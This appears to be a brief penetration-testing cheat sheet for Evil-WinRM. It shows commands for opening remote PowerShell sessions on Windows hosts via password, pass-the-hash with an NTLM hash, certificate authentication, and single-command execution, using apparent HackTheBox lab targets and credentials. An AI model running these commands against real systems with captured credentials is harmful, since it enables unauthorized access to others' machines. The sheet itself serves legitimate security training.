ToolsFebruary 9, 20261 min readby 0xt0pus

Evil-WinRM

Windows Remote Management shell for penetration testing with pass-the-hash support

#remote-access#windows#active-directory

Evil-WinRM

Description

Evil-WinRM is used to access Windows machines remotely via the WinRM service (port 5985/5986). It provides a PowerShell session on the target machine and is commonly used after finding valid credentials.

Usage 1: Connect with Username and Password

Command:

evil-winrm -i 10.10.10.149 -u Chase -p 'Q4)sJu\Y8qz*A3?d'

Usage 2: Connect with NTLM Hash (Pass the Hash)

Command:

evil-winrm -i 10.10.11.42 -u "administrator" -H "3dc553ce4b9fd20bd016e098d2d2fd2e"

Usage 3: Connect with SSL Certificate

Used when certificate-based authentication is required.

Command:

evil-winrm -S -c cert.cert -k cert.pem -i timelapse.htb

Usage 4: Connect and Run Command

Command:

evil-winrm -i TARGET -u user -p pass -c 'whoami'